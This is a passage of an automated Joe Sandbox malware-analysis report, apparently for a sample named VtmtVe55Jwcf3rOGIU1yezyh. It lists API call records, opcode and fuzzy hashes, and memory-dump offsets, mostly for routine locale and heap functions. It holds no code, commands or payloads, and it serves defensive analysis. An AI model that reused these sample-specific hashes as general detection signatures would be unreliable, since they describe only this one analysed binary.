• Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
• Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
• Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
• Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
Uniqueness
• Uniqueness Score: -1.00%
APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                  • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 040CC9E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: c9fd112eff7d30cf01973ff24189d0438d5dc46637376b9bc2f5ecbacc12e077
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB113C79A00208EFDB01DF98C989E9CBBF5AF08354F058094F948AB361D375EA50DF80
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                  • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID: 0B$DCA
• API String ID: 4212172061-1121888207
• Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
• Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
• GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
• GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP$B
• API String ID: 2299586839-1332025818
• Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
• Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
• Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
• Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
• EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: =CA${B
• API String ID: 1084509184-2907596089
• Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
• Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
• Opcode ID: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
• Instruction ID: 67309229f61afd2ab5856e0fbe736b03e5ebd4e934039cb527c6d869dde023b9
• Opcode Fuzzy Hash: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
• Instruction Fuzzy Hash: F0619F71A00127ABDB28DF25EC82BBB77E8EF44314F50406AED05C6682E778D995CF58
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 06cd5aec9bbefeefa8a3bc7bad5d1bc59d982319078da622735b0081b3eb93c9
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: C03149B6900609DFDB10DF99C884AAEFBF5FF48324F14408AD841A7210E775FA45CBA4
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
• Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
• Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
• Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
• EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: =CA
• API String ID: 1084509184-159236625
• Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
• Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                  • Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                  • Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                  • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                  • Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                                                  • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                  • Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                  • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                  • Instruction ID: 132fde00c3026ba385e258918c38b9eec635062562826c8cbc0ed6069a56d62f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F03131A503009FD714EF69D846B9D37F0EB04714F10512BF514EB2E1CB7849408B49
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
• Instruction ID: c54caae612f79c45943fa80a9590922199881531d53ba21540ab7825707139eb
• Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
• Instruction Fuzzy Hash: FEF0273530021497CB149B35E80966ABF90EB81714B86405EEE058B242C6759C43CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
• Instruction ID: d0f1a20189e36393daad9c8fb7d6be9c176ac9989c87cef9d6c19eed9d752231
• Opcode Fuzzy Hash: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
